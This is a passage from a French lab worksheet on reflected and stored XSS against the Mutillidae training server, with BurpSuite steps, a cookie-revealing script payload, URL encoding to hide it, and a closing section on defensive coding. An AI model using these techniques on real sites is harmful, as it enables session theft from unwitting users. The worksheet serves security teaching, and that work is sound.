<i>XSS</i> de type persistante visant à détourner les visiteurs d’une page vers une autre page permettant de voler leur identifiant de session.</p> <p class="Standard"> </p> <p class="Standard"><b>Ces deux défis peuvent être réalisés de manière indépendante (voir les prérequis). Chaque défi est associé à un dossier documentaire.</b></p> <p class="Standard"><b> </b></p> <p class="Standard"><img width="605" height="190" src= "owasp-activite3_AttaqueXSS_fichiers/image005.jpg" align="left" hspace="12" alt="image" />Pour rappel, l’environnement de travail est le suivant :</p> <p class="Standard"> Machine attaquante (192.168.1.10) Serveur Mutillidae (192.168.1.11)</p> <p class="Standard"> </p> <p class="Standard">Le serveur <i>Mutillidae</i> propose un site <i>Web</i> conçu pour identifier et tester les failles de sécurité identifiées par l’<i>OWASP</i>. Il est possible pour chacune d’entre elles, de définir le niveau de sécurité appliqué.</p> <p class="Standard"> </p> <p class="Standard">Notre démarche consistera, pour les failles de type <i>XSS</i> :</p> <p class="Standard" style='margin-left:54.0pt;text-indent:-18.0pt'> ●<span style= 'font:7.0pt "Times New Roman"'> </span> à partir de la version non sécurisée de la page concernée et à mettre en évidence la faille de sécurité ;</p> <p class="Standard" style='margin-left:54.0pt;text-indent:-18.0pt'> ●<span style= 'font:7.0pt "Times New Roman"'> </span> nous constaterons ensuite que dans la version sécurisée de cette page fournie par <i>Mutillidae</i>, l’attaque n’est plus possible ;</p> <p class="Standard" style='margin-left:54.0pt;text-indent:-18.0pt'> ●<span style= 'font:7.0pt "Times New Roman"'> </span> l’étude des mécanismes de sécurisation utilisés, donc du code de la page associée, permettra de dégager des bonnes pratiques de programmation.</p> <p class="Standard"> </p> <p class="Standard">Quant à la machine attaquante, elle comprend un navigateur ainsi que le proxy <i>BurpSuite</i> qui permet d’intercepter les requêtes avant de les envoyer au serveur. L’objectif étant de modifier les paramètres de certaines requêtes afin de tester des injections de code. Par exemple, la valeur saisie pour le login sera remplacée par du code <i>JavaScript</i>.</p> <p class="Standard"> </p> <h4 style= 'margin-left:34.0pt;text-indent:-34.0pt;page-break-before:always'> <a name="_Toc96200684">VI<span style= 'font:7.0pt "Times New Roman"'> </span> Premier défi : <i>XSS</i> réfléchi via un contexte <i>HTML</i></a></h4> <h5 style='margin-left:51.05pt;text-indent:-34.05pt'><a name= "_Toc96200685">1<span style= 'font:7.0pt "Times New Roman"'> </span> Objectif</a></h5> <p class="Standard">Le premier défi a pour objectif de récupérer l’identifiant de session d’une victime par injection de code <i>JavaScript</i>.</p> <p class="Standard"><span style='color:#0369A3'> </span></p> <h5 style='margin-left:51.05pt;text-indent:-34.05pt'><a name= "_Toc96200686">2<span style= 'font:7.0pt "Times New Roman"'> </span> À vous de jouer</a></h5> <p class="Standard">Les questions suivantes peuvent être traitées en suivant les étapes décrites dans <b>le dossier documentaire n°1 (page</b> <b>11</b><b>, <i>XSS</i> réfléchi via un contexte <i>HTML</i>).</b></p> <p class="Standard"> </p> <p class="Standard" align="left" style= 'margin-left:104.9pt;text-align:left; text-indent:-104.9pt'> <b><span style='font-size:12.0pt'>Travail à faire 1<span style= 'font:7.0pt "Times New Roman"'> </span></span></b> <b><i>XSS</i> réfléchi via un contexte <i>HTML</i></b></p> <p class="Standard" align="left" style='text-align:left'> <span style='font-size: 6.0pt'> </span></p> <p class="Standard"><i>Le but de cette première série de questions est d’étudier le comportement de l’application en mode non sécurisé et de tester l’attaque visant à obtenir le cookie d’identifiant de session de la victime.</i></p> <p class="Standard" align="left" style='text-align:left'> </p> <p class="Standard" style= 'margin-top:0cm;margin-right:0cm;margin-bottom:5.65pt; margin-left:42.55pt;text-indent:-24.55pt'> <b><span style='font-size:11.0pt'>Q1.<span style= 'font:7.0pt "Times New Roman"'> </span></span></b> Commencer par préparer votre environnement de travail en démarrant le serveur <i>Mutillidae</i> ainsi que la machine cliente contenant le <i>proxy</i> <i>BurpSuite</i>. Vérifier que vos deux machines peuvent communiquer via un <i>ping</i>. Puis, positionner le niveau de sécurité de <i>Mutillidae</i> à 0.</p> <p class="Standard" style= 'margin-left:42.55pt;text-indent:-24.55pt'><b><span style= 'font-size:11.0pt'>Q2.<span style= 'font:7.0pt "Times New Roman"'> </span></span></b> À l’aide du dossier documentaire n°1 situé en page 10, réaliser le premier défi permettant de capturer le <i>cookie</i> d’identification de la victime. Vous prendrez soin de réaliser vos propres captures d’écrans dans votre compte rendu de TP.</p> <p class="Standard"> </p> <p class="Standard" align="left" style= 'margin-left:104.9pt;text-align:left; text-indent:-104.9pt'> <b><span style='font-size:12.0pt'>Travail à faire 2<span style= 'font:7.0pt "Times New Roman"'> </span></span></b> <b>Nouvelle tentative en mode sécurisé et analyse du code source</b></p> <p class="Standard" align="left" style='text-align:left'> <b><span style='font-size: 6.0pt'> </span></b></p> <p class="Standard" align="left" style='text-align:left'><i>Le but de cette deuxième partie est de tester à nouveau l’attaque après activation du codage sécurisé et de comprendre l’encodage mis en place.</i></p> <p class="Standard" align="left" style='text-align:left'> <i> </i></p> <p class="Standard" align="left" style='text-align:left'><i>Test du niveau 1 de sécurité :</i></p> <p class="Standard"> </p> <p class="Standard" style= 'margin-top:0cm;margin-right:0cm;margin-bottom:5.65pt; margin-left:42.55pt;text-indent:-24.55pt'> <b><span style='font-size:11.0pt'>Q1.<span style= 'font:7.0pt "Times New Roman"'> </span></span></b> Est-ce que le niveau de sécurité 1 permet d’éviter l’attaque avec <i>Burpsuite</i> ?</p> <p class="Standard" style= 'margin-top:0cm;margin-right:0cm;margin-bottom:5.65pt; margin-left:42.55pt;text-indent:-24.55pt'> <b><span style='font-size:11.0pt'>Q2.<span style= 'font:7.0pt "Times New Roman"'> </span></span></b> Est-il possible d’écrire le code malicieux directement dans le formulaire ?</p> <p class="Standard" style= 'margin-top:0cm;margin-right:0cm;margin-bottom:5.65pt; margin-left:42.55pt;text-indent:-24.55pt'> <b><span style='font-size:11.0pt'>Q3.<span style= 'font:7.0pt "Times New Roman"'> </span></span></b> En observant le code de la page <i>dns-lookup.php</i>, repérer les sécurités activées à ce niveau.</p> <p class="Standard" style= 'margin-left:42.55pt;text-indent:-24.55pt'><b><span style= 'font-size:11.0pt'>Q4.<span style= 'font:7.0pt "Times New Roman"'> </span></span></b> Quels sont les caractères typiques utilisés lors d’une attaque <i>XSS </i>?</p> <p class="Standard"> </p> <p class="Standard"><i>Test du niveau 5 de sécurité :</i></p> <p class="Standard"> </p> <p class="Standard" style= 'margin-top:0cm;margin-right:0cm;margin-bottom:5.65pt; margin-left:42.55pt;text-indent:-24.55pt'> <b><span style='font-size:11.0pt'>Q5.<span style= 'font:7.0pt "Times New Roman"'> </span></span></b> Est-ce que le niveau de sécurité 5 permet d’éviter l’attaque avec <i>BurpSuite</i> ?</p> <p class="Standard" style= 'margin-top:0cm;margin-right:0cm;margin-bottom:5.65pt; margin-left:42.55pt;text-indent:-24.55pt'> <b><span style='font-size:11.0pt'>Q6.<span style= 'font:7.0pt "Times New Roman"'> </span></span></b> En observant le fichier <i>dns-lookup.php</i>, repérer les variables spécifiques associées à ce niveau de protection.</p> <p class="Standard" style= 'margin-left:42.55pt;text-indent:-24.55pt'><b><span style= 'font-size:11.0pt'>Q7.<span style= 'font:7.0pt "Times New Roman"'> </span></span></b> Expliquer le rôle de l’instruction suivante dans le fichier <i>dns-lookup.php</i> (ligne n° 44) :</p> <p class="Standard"><img width="605" height="21" src= "owasp-activite3_AttaqueXSS_fichiers/image006.gif" align="left" hspace="12" alt="image" /></p> <p class="Standard" style= 'margin-top:0cm;margin-right:0cm;margin-bottom:5.65pt; margin-left:42.55pt;text-indent:-24.55pt'> <b><span style='font-size:11.0pt'>Q8.<span style= 'font:7.0pt "Times New Roman"'> </span></span></b> Que vérifie la protection contre les injections de commandes ?</p> <p class="Standard" style= 'margin-top:0cm;margin-right:0cm;margin-bottom:5.65pt; margin-left:42.55pt;text-indent:-24.55pt'> <b><span style='font-size:11.0pt'>Q9.<span style= 'font:7.0pt "Times New Roman"'> </span></span></b> Quelle fonction permet d’éviter spécifiquement les attaques de type <i>XSS</i> ?</p> <p class="Standard" style= 'margin-top:0cm;margin-right:0cm;margin-bottom:5.65pt; margin-left:42.55pt;text-indent:-24.55pt'> <b><span style='font-size:11.0pt'>Q10. </span></b>Modifier le code source de la page <i>dns-lookup.php</i> afin d’isoler l’effet de cette protection.</p> <p class="Standard" style= 'margin-left:42.55pt;text-indent:-24.55pt'><b><span style= 'font-size:11.0pt'>Q11. </span></b>Résumer les protections mises en œuvre par le niveau de protection n°5.</p> <p class="Standard"> </p> <p class="Standard"><b><u><span style='color:#006600'>Prolongement possible :</span></u></b></p> <p class="Standard"><b><span style='color:#006600'>Reprendre une application existante et mettre en place le niveau de sécurité 5.</span></b></p> <h4><span style= 'font-size:10.0pt;font-weight:normal'> </span></h4> <h4 style= 'margin-top:0cm;margin-right:-5.65pt;margin-bottom:6.0pt;margin-left: 34.0pt;text-indent:-34.0pt;page-break-before:always'> <a name="_Toc96200687">VII<span style= 'font:7.0pt "Times New Roman"'> </span> Deuxième défi : <i>XSS</i> permanent via une page affichant des <i>logs</i></a></h4> <h5 style='margin-left:51.05pt;text-indent:-34.05pt'><a name= "_Toc96200688">1<span style= 'font:7.0pt "Times New Roman"'> </span> Objectif</a></h5> <p class="Standard">Ce second défi a pour objectif d’empoisonner une page affichant des logs de manière permanente par stockage de code malveillant dans la base de données. La victime est ensuite redirigée vers une page malveillante qui capture ses identifiants de session .</p> <p class="Standard"><b> </b></p> <h5 style='margin-left:51.05pt;text-indent:-34.05pt'><a name= "_Toc96200689">2<span style= 'font:7.0pt "Times New Roman"'> </span> À vous de jouer</a></h5> <p class="Standard">Les questions suivantes se traitent en suivant les étapes décrites dans le dossier documentaire n°2 (page 14, <i>XSS</i> permanent via une page affichant des <i>logs</i>).</p> <p class="Standard"> </p> <p class="Standard" align="left" style= 'margin-left:104.9pt;text-align:left; text-indent:-104.9pt'> <b><span style='font-size:12.0pt'>Travail à faire 3<span style= 'font:7.0pt "Times New Roman"'> </span></span></b> <b><i>XSS</i> permanent via une page affichant des <i>logs</i></b></p> <p class="Standard" align="left" style='text-align:left'> </p> <p class="Standard"><i>Dans un premier temps, l’objectif est de se placer côté attaquant en empoisonnant une page Web afin de rendre l’attaque XSS permanente.</i></p> <p class="Standard" align="left" style='text-align:left'> </p> <p class="Standard" style= 'margin-left:42.55pt;text-indent:-24.55pt'><b><span style= 'font-size:11.0pt'>Q1.<span style= 'font:7.0pt "Times New Roman"'> </span></span></b> Commencer par préparer votre environnement de travail en démarrant le serveur <i>Mutillidae</i> ainsi que la machine cliente contenant le <i>proxy BurpSuite</i>. Vérifier que vos deux machines peuvent communiquer via un <i>ping</i>. Puis, positionner le niveau de sécurité de <i>Mutillidae</i> à 0.</p> <p class="Standard"> </p> <p class="Standard" style= 'margin-left:42.55pt;text-indent:-24.55pt'><b><span style= 'font-size:11.0pt'>Q2.<span style= 'font:7.0pt "Times New Roman"'> </span></span></b> À l’aide du dossier documentaire n°2 situé en page 14, réaliser le deuxième défi permettant de capturer les <i>cookies</i> d’identification des victimes qui visitent la page des <i>logs</i>. Vous prendrez soin de réaliser vos propres captures d’écrans dans votre compte rendu de TP.</p> <p class="Standard"> </p> <p class="Standard" align="left" style= 'margin-left:104.9pt;text-align:left; text-indent:-104.9pt'> <b><span style='font-size:12.0pt'>Travail à faire 4<span style= 'font:7.0pt "Times New Roman"'> </span></span></b> <b>Codage sécurisé et analyse du code source</b></p> <p class="Standard" align="left" style='text-align:left'> <b> </b></p> <p class="Standard" align="left" style='text-align:left'><i>Le but de cette deuxième partie est de tester à nouveau l’attaque après activation du codage sécurisé et de comprendre le codage mis en place pour sécuriser la page.</i></p> <p class="Standard"> </p> <p class="Standard" style= 'margin-left:42.55pt;text-indent:-24.55pt'><b><span style= 'font-size:11.0pt'>Q1.<span style= 'font:7.0pt "Times New Roman"'> </span></span></b> Fermer puis relancer <i>BurpSuite</i>. Positionner le niveau de sécurité à 5 et relancer l’attaque en suivant à nouveau les étapes décrites dans le deuxième dossier documentaire.</p> <p class="Standard"> </p> <p class="Standard" style= 'margin-left:42.55pt;text-indent:-24.55pt'><b><span style= 'font-size:11.0pt'>Q2.<span style= 'font:7.0pt "Times New Roman"'> </span></span></b> L’attaque réussit-elle avec le niveau de sécurité 5 ?</p> <p class="Standard"> </p> <p class="Standard" style= 'margin-left:42.55pt;text-indent:-24.55pt'><b><span style= 'font-size:11.0pt'>Q3.<span style= 'font:7.0pt "Times New Roman"'> </span></span></b> Ouvrir la page <i>show-log.php</i> et relever les options activées au niveau de sécurité 5. Expliquer pourquoi la validation des données saisies en entrée (<i>input validation</i>) n’est pas suffisante comme mesure de sécurité.</p> <p class="Standard"> </p> <p class="Standard" style= 'margin-left:42.55pt;text-indent:-24.55pt'><b><span style= 'font-size:11.0pt'>Q4.<span style= 'font:7.0pt "Times New Roman"'> </span></span></b> Expliquer le rôle des options de sécurité activées au niveau 5.</p> <p class="Standard"> </p> <p class="Standard" style= 'margin-left:42.55pt;text-indent:-24.55pt'><b><span style= 'font-size:11.0pt'>Q5.<span style= 'font:7.0pt "Times New Roman"'> </span></span></b> Rechercher sur internet d’autres exemples d’encodage associés à d’autres langages de programmation.</p> <p class="Standard"> </p> <p class="Standard" style= 'margin-left:42.55pt;text-indent:-24.55pt'><b><span style= 'font-size:11.0pt'>Q6.<span style= 'font:7.0pt "Times New Roman"'> </span></span></b> Conclure sur les bonnes pratiques en matière de protection contre le <i>XSS</i>.</p> <span style= 'font-size:12.0pt;font-family:"Arial",sans-serif'><br clear="all" style='page-break-before:always' /></span> <p class="MsoNormal"><span style= 'font-size:10.0pt;color:navy'> </span></p> <p class="Standard" align="left" style='text-align:left'> </p> <h4 style='margin-left:34.0pt;text-indent:-34.0pt'><a name= "_Toc96200690">VIII<span style= 'font:7.0pt "Times New Roman"'> </span> Conclusion</a></h4> <p class="Standard"> </p> <p class="Standard"><b>Aperçu général des mesures de défense</b></p> <p class="Standard"> </p> <p class="Standard">En résumé, les principales mesures de défense concernant les problématiques <i>XSS</i> sont les suivantes :</p> <p class="Standard"> </p> <table class="MsoNormalTable" border="0" cellspacing="0" cellpadding="0" width="0" style= 'margin-left:-.25pt;border-collapse:collapse'> <tr> <td width="605" valign="top" style= 'width:453.5pt;border:solid black 1.0pt; padding:2.75pt 2.75pt 2.75pt 2.75pt'> <p class="TableContents"><b>Validation des données en entrée</b></p> <p class="TableContents"><b> </b></p> <p class="TableContents" style= 'margin-left:36.0pt;text-indent:-18.0pt'><span style= 'font-family:OpenSymbol'>•<span style= 'font:7.0pt "Times New Roman"'> </span></span> Effectuer des vérifications du côté serveur sur les données saisies et pas seulement côté client.</p> <p class="TableContents" style= 'margin-left:36.0pt;text-indent:-18.0pt'><span style= 'font-family:OpenSymbol'>•<span style= 'font:7.0pt "Times New Roman"'> </span></span> Créer des listes blanches de caractères autorisés et des listes noires de caractères interdits et les associer à des expressions régulières : [^<>&\’].</p> </td> </tr> <tr> <td width="605" valign="top" style= 'width:453.5pt;border:solid black 1.0pt; border-top:none;padding:2.75pt 2.75pt 2.75pt 2.75pt'> <p class="TableContents"><b>Encodage des paramètres</b></p> <p class="TableContents"><b> </b></p> <p class="TableContents" style= 'margin-left:36.0pt;text-indent:-18.0pt'><span style= 'font-family:OpenSymbol'>•<span style= 'font:7.0pt "Times New Roman"'> </span></span> Utiliser des fonctions d’encodage des données qui empêcheront l’exécution des scripts.</p> <p class="TableContents"> </p> <p class="TableContents"><i>Exemple en Java :</i></p> <p class="TableContents"> </p> <p class="TableContents"><u>SANS ENCODAGE</u>:</p> <p class="TableContents" align="left" style='text-align:left'> </p> <p class="TableContents" align="left" style='text-align:left'> System.out.println(<span style= 'font-family:Ubuntu'>"<</span>HTML><HEAD><BODY>Bonjour + <span style= 'font-family:Ubuntu'>"</span>request.getParameter(<span style= 'font-family:Ubuntu'>"NomClient") +"</BODY></HTML>") ;</span></p> <p class="TableContents" align="left" style='text-align:left'> <span style='font-family:Ubuntu'> </span></p> <p class="TableContents" align="left" style='text-align:left'> <u><span style='font-family:Ubuntu'>AVEC ENCODAGE</span></u><span style='font-family: Ubuntu'>:</span></p> <p class="TableContents" align="left" style='text-align:left'> <span style='font-family:Ubuntu'> </span></p> <p class="TableContents" align="left" style='text-align:left'> <span style='font-family:Ubuntu'>1- Application de la REGEX : NomClientApresRegex = …</span></p> <p class="TableContents" align="left" style='text-align:left'> <span style='font-family:Ubuntu'> </span></p> <p class="TableContents" align="left" style='text-align:left'> <span style='font-family:Ubuntu'>via une fonction qui filtre selon la liste blanche et la liste noire des caractères interdits.</span></p> <p class="TableContents" align="left" style='text-align:left'> <span style='font-family:Ubuntu'> </span></p> <p class="TableContents" align="left" style='text-align:left'> <span style='font-family:Ubuntu'>2- Encodage</span></p> <p class="TableContents" align="left" style='text-align:left'> </p> <p class="TableContents" align="left" style='text-align:left'> <span style= 'font-family:Ubuntu'>System.out.println("<HTML><HEAD><BODY>Bonjour + "<b>Encoder.encodeForHtml</b>(NomClientApresRegex) +"</BODY></HTML>") ;</span></p> <p class="TableContents" align="left" style='text-align:left'> <span style='font-family:Ubuntu'> </span></p> <p class="TableContents" align="left" style= 'margin-left:36.0pt;text-align:left; text-indent:-18.0pt'> <span style='font-family:OpenSymbol'>•<span style= 'font:7.0pt "Times New Roman"'> </span></span> <span style='font-family:Ubuntu'>Adapter l’encodage des données au contexte de développement :</span></p> <p class="TableContents" align="left" style='text-align:left'> <img width="407" height="167" src= "owasp-activite3_AttaqueXSS_fichiers/image007.jpg" align="left" hspace="12" alt="image" /></p> <p class="TableContents" align="left" style='text-align:left'> <span style='font-family:Ubuntu'> </span></p> <p class="TableContents" align="left" style='text-align:left'> <span style='font-family:Ubuntu'> </span></p> <p class="TableContents" align="left" style='text-align:left'> <span style='font-family:Ubuntu'> </span></p> <p class="TableContents" align="left" style='text-align:left'> <span style='font-family:Ubuntu'> </span></p> <p class="TableContents" align="left" style='text-align:left'> <span style='font-family:Ubuntu'> </span></p> <p class="TableContents" align="left" style='text-align:left'> <span style='font-family:Ubuntu'> </span></p> <p class="TableContents" align="left" style='text-align:left'> <span style='font-family:Ubuntu'> </span></p> </td> </tr> </table> <p class="Standard"><span style='color:#006600'> </span></p> <p class="MsoTitle" style='page-break-before:always'> <u><span style='font-size: 14.0pt'>Dossier documentaire</span></u></p> <h1><a name="_Toc96200691"></a><a name="dossier_1" id= "dossier_1"></a><span style= 'font-size: 13.0pt;color:maroon'>Dossier 1 : <i>XSS</i> réfléchi via un contexte <i>HTML</i></span></h1> <p class="Standard">La démarche permettant de réaliser ce premier défi est la suivante :</p> <p class="Standard"> </p> <p class="Standard" style='margin-left:36.0pt;text-indent:-18.0pt'> 1.<span style= 'font:7.0pt "Times New Roman"'> </span> dans un premier temps, l’attaquant va générer un code malveillant en <i>JavaScript</i> permettant d’afficher le <i>cookie</i> d’identification d’une personne authentifiée ;</p> <p class="Standard" style='margin-left:36.0pt;text-indent:-18.0pt'> 2.<span style= 'font:7.0pt "Times New Roman"'> </span> ensuite, ce code <i>JavaScript</i> est encodé via un format d’<i>URL</i> afin d’être rendu plus discret ;</p> <p class="Standard" style='margin-left:36.0pt;text-indent:-18.0pt'> 3.<span style= 'font:7.0pt "Times New Roman"'> </span> enfin, il ne reste plus qu’à remplacer le login saisi par le code malveillant afin de faire exécuter le code <i>JavaScript</i>.</p> <p class="Standard"> </p> <p class="Standard">Ce premier défi permet donc de mettre en avant la vulnérabilité <i>XSS</i>.</p> <p class="Standard"> </p> <p class="Standard"><b>Étape n°1 : Préparation du défi</b></p> <p class="Standard"> </p> <p class="Standard">Positionner le <i>proxy</i> à <b>intercept off</b> puis ouvrir la page suivante :</p> <p class="Standard"><b> </b></p> <p class="Standard"><i>OWASP 2017 => A7 : Cross Site Scripting (XSS) => Reflected (First Order) => DNS Lookup</i></p> <p class="Standard"><i> </i></p> <p class="Standard">Cette page permet d’effectuer des résolutions DNS.</p> <p class="Standard"> </p> <p class="Standard"><img width="426" height="137" src= "owasp-activite3_AttaqueXSS_fichiers/image008.jpg" align="left" hspace="12" alt="image" /></p> <p class="Standard"><b> </b></p> <p class="Standard"><b> </b></p> <p class="Standard"><b> </b></p> <p class="Standard"><b> </b></p> <p class="Standard"><b> </b></p> <p class="Standard"><b> </b></p> <p class="Standard"><b> </b></p> <p class="Standard"><b> </b></p> <p class="Standard"><b> </b></p> <p class="Standard"><b>Étape n°2 : Capture d’une requête</b></p> <p class="Standard"><b> </b></p> <p class="Standard"><span style= 'position:absolute;z-index:38;left:0px; margin-left:302px;margin-top:2152px;width:266px;height:65px'> <img width="213" height="52" src= "owasp-activite3_AttaqueXSS_fichiers/image009.gif" alt= "image" /></span>Positionner le <i>proxy</i> à <b>intercept on</b> et saisir une donnée dans le champ texte de la page. Dans notre exemple, nous saisissons <b>localhost</b>. Valider ensuite la saisie en cliquant sur le bouton <b>Lookup DNS</b> et cliquer éventuellement sur le bouton <b>Forward (si adresse différente de )</b> du <i>proxy BurpSuite</i>. La saisie effectuée est ainsi capturée et le <i>proxy</i> est en attente.</p> <p class="Standard"><img width="479" height="268" src= "owasp-activite3_AttaqueXSS_fichiers/image010.jpg" align="left" hspace="12" alt="image" /></p> <p class="Standard"> </p> <p class="Standard"><span style= 'position:absolute;z-index:3;left:0px;margin-left: 169px;margin-top:2389px;width:84px;height:28px'> <img width="67" height="22" src= "owasp-activite3_AttaqueXSS_fichiers/image011.gif" alt= "image" /></span>À ce stade, il peut être intéressant d’observer le comportement de l’application lorsqu’on lui envoie une donnée. Pour cela, faire un clic droit au milieu de la capture précédente et cliquer sur <b>Send to Repeater</b>. Puis au niveau de l’onglet <b>Repeater</b> de <i>BurpSuite</i>, cliquer sur le bouton <b>Send</b> pour observer la réponse.</p> <p class="Standard"> </p> <p class="Standard"></p> <table cellpadding="0" cellspacing="0" align="left"> <tr> <td width="390" height="2459"></td> </tr> <tr> <td></td> <td><img width="54" height="17" src= "owasp-activite3_AttaqueXSS_fichiers/image012.gif" alt= "image" /></td> </tr> </table> <img width="605" height="283" src= "owasp-activite3_AttaqueXSS_fichiers/image013.jpg" align="left" hspace="12" alt="image" /> <p class="Standard">Ce type de capture permet de tester si des caractères suspects sont échappés. Par exemple, si la valeur saisie est la chaîne <b><script></b>, on peut voir que cette dernière est directement envoyée au serveur sans modification. L’onglet <b>repeteur</b> permet de multiplier les tests avec des valeurs saisies différentes sans avoir à manipuler de nouveau le formulaire de l’application <i>Web</i>.</p> <p class="Standard"> </p> <p class="Standard"><img width="374" height="78" src= "owasp-activite3_AttaqueXSS_fichiers/image014.jpg" align="left" hspace="12" alt="image" /></p> <p class="Standard"></p> <table cellpadding="0" cellspacing="0" align="left"> <tr> <td width="148" height="2305"></td> </tr> <tr> <td></td> <td><img width="63" height="24" src= "owasp-activite3_AttaqueXSS_fichiers/image015.gif" alt= "image" /></td> </tr> </table> <p class="Standard"> </p> <p class="Standard"><b> </b></p> <p class="Standard"><b> </b></p> <p class="Standard"><b> </b></p> <br clear="all" /> <p class="Standard"><b>Étape n°3 : Création et exploitation du <i>payload</i></b></p> <p class="Standard"><b> </b></p> <p class="Standard"><b>L’attaque consiste à remplacer la valeur saisie (adresse IP ou nom de machine) par un code <i>JavaScript</i> encodé de façon à ne pas attirer l’attention de la victime. Cette modification se fera alors que la requête est interceptée par <i>BurpSuite</i>.</b></p> <p class="Standard"><b> </b></p> <p class="Standard">L’étape suivante consiste à générer le code malveillant. Il s’agit d’un script qui va afficher le <i>cookie</i> de session de la victime. Pour cela, reproduire l’étape n°2 jusqu’à la capture de la requête et remplacer la valeur saisie (localhost) par le code suivant : <i><script>alert(document.cookie);</script></i> .</p> <p class="Standard"></p> <table cellpadding="0" cellspacing="0" align="left"> <tr> <td width="94" height="2713"></td> </tr> <tr> <td></td> <td><img width="270" height="22" src= "owasp-activite3_AttaqueXSS_fichiers/image016.gif" alt= "image" /></td> </tr> </table> <br clear="all" /> <p class="Standard"><img width="605" height="301" src= "owasp-activite3_AttaqueXSS_fichiers/image017.jpg" align="left" hspace="12" alt="image" /></p> <p class="Standard"> </p> <p class="Standard">Sélectionner ensuite le <i>payload</i> avec la souris :</p> <p class="Standard"><img width="605" height="30" src= "owasp-activite3_AttaqueXSS_fichiers/image018.jpg" align="left" hspace="12" alt="image" /></p> <p class="Standard">Puis, faire un clic droit et cliquer sur <b>Send to Decoder</b>. Le but est d’encoder notre <i>payload</i> dans un format plus discret. En effet, les attaques <i>XSS</i> de type <i>reflected</i> passent généralement par le vecteur d’un lien malveillant.</p> <p class="Standard"> </p> <p class="Standard">Aller sur l’onglet <b>Decoder</b> de <i>BurpSuite</i> et sélectionner l’option <b>Encode as URL</b>.</p> <p class="Standard"></p> <table cellpadding="0" cellspacing="0" align="left"> <tr> <td width="635" height="2644"></td> </tr> <tr> <td></td> <td><img width="70" height="21" src= "owasp-activite3_AttaqueXSS_fichiers/image019.gif" alt= "image" /></td> </tr> </table> <br clear="all" /> <p class="Standard"><img width="605" height="253" src= "owasp-activite3_AttaqueXSS_fichiers/image020.jpg" align="left" hspace="12" alt="image" /></p> <table cellpadding="0" cellspacing="0" align="left"> <tr> <td width="9" height="2667"></td> </tr> <tr> <td></td> <td><img width="20" height="27" src= "owasp-activite3_AttaqueXSS_fichiers/image021.gif" alt= "image" /></td> </tr> </table> <p class="Standard">Il ne reste plus qu’à copier/coller le <i>payload</i> généré et à l’injecter à la place de notre valeur saisie.</p> <p class="Standard"></p> <table cellpadding="0" cellspacing="0" align="left"> <tr> <td width="266" height="2746"></td> </tr> <tr> <td></td> <td><img width="606" height="20" src= "owasp-activite3_AttaqueXSS_fichiers/image022.gif" alt= "image" /></td> </tr> </table> <br clear="all" /> <p class="Standard"><img width="605" height="170" src= "owasp-activite3_AttaqueXSS_fichiers/image023.jpg" align="left" hspace="12" alt="image" /></p> <p class="Textbody">La validation se fait en cliquant sur le bouton <b>Forward</b> du <i>proxy</i>. Le <i>cookie</i> d’identification est alors visible sur la page <i>Web</i> cible.</p> <p class="Standard"> </p> <p class="Standard"><img width="478" height="243" src= "owasp-activite3_AttaqueXSS_fichiers/image024.jpg" align="left" hspace="12" alt="image" /></p> <p class="Standard" style='page-break-before:always'> </p> <p class="Standard"><a name="dossier_2" id= "dossier_2"></a><b><span style= 'font-size:13.0pt; color:maroon'>Dossier 2 : <i>XSS</i> permanent via une page affichant des <i>logs</i></span></b></p> <p class="Standard" style='margin-bottom:7.0pt;line-height:120%'> <b> </b></p> <p class="Standard">La démarche permettant de réaliser ce deuxième défi est la suivante :</p> <p class="Standard"> </p> <p class="Standard" style='margin-left:36.0pt;text-indent:-18.0pt'> 1.<span style= 'font:7.0pt "Times New Roman"'> </span> Dans un premier temps, l’idée est d’observer le comportement d’une page affichant des <i>logs</i> lorsqu’un échec d’authentification se produit.</p> <p class="Standard" style='margin-left:36.0pt;text-indent:-18.0pt'> 2.<span style= 'font:7.0pt "Times New Roman"'> </span> Fort du constat que la donnée saisie est directement enregistrée dans la base de données sans validation, il est alors possible de remplacer cette donnée afin de stocker un code malveillant.</p> <p class="Standard" style='margin-left:36.0pt;text-indent:-18.0pt'> 3.<span style= 'font:7.0pt "Times New Roman"'> </span> Toute personne qui visitera la page d’affichage des logs exécutera le code malveillant. Ce code renvoie vers une page malveillante qui va stocker le <i>cookie</i> d’identification de session de toutes les victimes.</p> <p class="Standard"> </p> <p class="Standard">Contrairement au premier défi, cette attaque <i>XSS</i> est donc permanente car stockée dans la base de données qui se trouve ainsi corrompue.</p> <p class="Standard"> </p> <p class="Standard"><b>Étape n°1 : Préparation du défi</b></p> <p class="Standard"> </p> <p class="Standard" style='margin-bottom:7.0pt;line-height:120%'> Fermer tous les logiciels puis ouvrir de nouveau le <i>proxy BurpSuite</i> et l’application <i>Web Mutillidae</i>. Positionner le <i>proxy BurpSuite</i> à <b>intercept off.</b></p> <p class="Standard" style='margin-bottom:7.0pt;line-height:120%'> S’authentifier avec un compte inexistant <i>login/register</i> (utilisateur <i>test</i> par exemple).</p> <p class="Standard" style='margin-bottom:7.0pt;line-height:120%'> Ouvrir la page suivante : <i>Others => Denial of service => Show Web Log</i>.</p> <p class="Standard" style='margin-bottom:7.0pt;line-height:120%'> <span style= 'position:absolute;z-index:19;left:0px;margin-left:544px;margin-top:3135px; width:42px;height:35px'> <img width="34" height="28" src= "owasp-activite3_AttaqueXSS_fichiers/image025.gif" alt= "image" /></span><span style= 'position:absolute;z-index:18;left:0px;margin-left:517px;margin-top:3033px; width:68px;height:31px'><img width="54" height="25" src="owasp-activite3_AttaqueXSS_fichiers/image026.gif" alt="image" /></span>La page qui s’ouvre permet d’afficher les traces (<i>logs</i>) des tentatives d’authentification.</p> <p class="Standard" style='margin-bottom:7.0pt;line-height:120%'> <img width="605" height="309" src= "owasp-activite3_AttaqueXSS_fichiers/image027.jpg" align="left" hspace="12" alt="image" /></p> <p class="Standard" style='margin-bottom:7.0pt;line-height:120%'>À ce niveau, on peut faire deux remarques :</p> <p class="Standard" style= 'margin-top:0cm;margin-right:0cm;margin-bottom:7.0pt; margin-left:36.0pt;text-indent:-18.0pt;line-height:120%'> 1.<span style= 'font:7.0pt "Times New Roman"'> </span> Les traces des tentatives d’authentification sont visiblement persistantes, car elles sont enregistrées dans la base de données ;</p> <p class="Standard" style= 'margin-top:0cm;margin-right:0cm;margin-bottom:7.0pt; margin-left:36.0pt;text-indent:-18.0pt;line-height:120%'> 2.<span style= 'font:7.0pt "Times New Roman"'> </span> Le <i>login</i> saisi précédemment (<i>test</i>) fait partie de ce qui est enregistré dans la base de données.</p> <p class="Standard" style='margin-bottom:7.0pt;line-height:120%'>Si la valeur saisie dans le champ <i>login</i> n’est pas protégée alors elle sera directement enregistrée, en l’état, dans la base 